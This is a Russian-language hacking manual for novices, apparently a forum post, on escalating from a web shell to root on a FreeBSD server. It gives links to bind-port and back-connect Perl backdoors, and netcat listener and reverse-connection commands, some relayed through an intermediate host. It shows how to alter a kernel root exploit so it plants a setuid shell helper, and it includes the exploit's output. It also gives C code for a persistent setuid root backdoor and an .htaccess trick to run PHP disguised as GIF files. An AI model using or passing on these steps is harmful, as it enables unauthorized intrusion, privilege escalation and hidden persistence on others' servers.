Мануал предназначен для новичков. В нем я постараюсь расписать пошаговою инструкцию рутанья, а также как спрятать свой шелл от админов (:

• Поехали! (:

• Смотрим версию ядра: uname -a
• Ищем сплойты google.com. milw0rm.com

# uname -a
FreeBSD *** 7.0-RELEASE FreeBSD 7.0-RELEASE #2: Wed Jul 16 15:22:07 UTC 2008     root@:/usr/src/sys/i386/compile/colo2  i386

• Биндпорт \ бекконет
  
  Для того чтобы порутать хост нам необходимо приконнектится к нему.
  Если кто не вкурил и спросит: "у нас ведь есть вебшелл", то объясню: нужна оболочка, типа баша)
  
  Лично я часто использую биндпорт от STNC:
  http://uasc.org.ua/files/backdoor.pl.txt
  А также бекконект от Алексайза:
  http://uasc.org.ua/files/connectback.pl.txt
  • Биндпортим
  Если вы используете шелл с возможностю биндпорта или бэкконекта, можете воспользоваться.
  Если же нет, тогда льем на хост и запускаем:
  perl backdoor.pl
  Назовите более беспалевно (:
  Далее у себя на компе (Должен быть установлен netcat)
  nc host.com 31337
  Если законектились - отлично, пропускайте следующий пункт. Если же нет, что бывает, потому что нас блочит фаер, пробуем использовать бекконект
  • Бекконектимся
    
    Существуют 2 варианта бекконекта - на свой комп, и с использованием промежуточного. Чаще всего используют вторую схему, так как для первой у вас должен быть выделенный ip, что бывает далеко не у всех. Но все же эту схему рассмотреть стоит, и так:
    • На свой комп
      На своем компе открываем порт для прослушки:
      nc -l -p31336
      Затем, на том хосте что хекаем, аплоудим скрипт, и запускаем из вебшелла:
      dc.pl [ВАШ_ИП] 31336
      Опять не работает? Скорее всего ваш ип адрес не является выделенным, а значит читаем дальше...
    • C использованием промежуточного хоста
      
      На промежуточном хосте, биндим порт (31337).
      У себя на компе, соединяемся с промежуточным:
      nc site.com 31337
      На промежуточном должен быть неткат, если его нет, то ставим. Сложностей это вызвать не должно.
      Затем открываем порт на промежуточном хосте:
      nc -l -p31336
      Потом с сайта, который рутаем делаем бекконет на промежуточный, как было описано выше.
  
  Но что делать, если и тут всё обламывает файервол?
  Вообщето сплойты можна юзать из веба (Кстате, тут я описываю случай с FreeBSD, а такая фича тестилась на шелле под линукс) Чтобы не переписывать, что что уже писал, копипаст из моего поста в РоА:
  1. Смотрим плоент, ищем что то типа:
  
  Цитата:
  execl("/bin/sh", "sh", NULL);
  2. Меняем на:
  
  Цитата:
  execl("/bin/sh","/bin/sh", "-c", "cp ./suidnik ./s; chown root ./s; chgrp root ./s; chmod 777 ./s; chmod +s ./s;", NULL);
  3. Дальше все просто) Заливаем "suidnik":
  
  Код:

  #include <stdio.h>
   int main(int argc, char **argv){
  system(argv[1]);
   }

  (пздц, никогда не кодил на си, а тут такой код )
  Компилим его, компилим сплоент, и запускаем из шелла. Потом увидим еще файлик "s".
  4. Вроде все, юзаем:
  
  Код:

  ./s "id"

• Законнектились!

gcc bsd-ktimer.c -o free
chmod 755 free
./free

# ./free
FreeBSD local kernel root exploit
by: christer/mu-b
http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!

* allocated pointer page: 0x00000000 -> 0x08000000 [134217728-bytes]
* allocated itimer struct: 0x20000000 -> 0x200000DC [220-bytes]
* filling pointer page... done
* found posix_clocks @ [0xc08ecf80]
* it_page->it_clockid: 0x0CC274B6 [access @0xBFBFEDB8]
* ktimer_delete (0xD0000000)
* ktimer_delete: 0 1
#

main() { 
setuid(0); 
setgid(0); 
system("/bin/bash"); 
}

gcc 1.c -o syser
chmod 755 syser
chmod +s syser
mv syser /bin/syser

$ /bin/syser
id
uid=0(root) gid=0(wheel) groups=0(wheel),80(www),1003(suwww)

• Как спрятатся?

AddType application/x-httpd-php .gif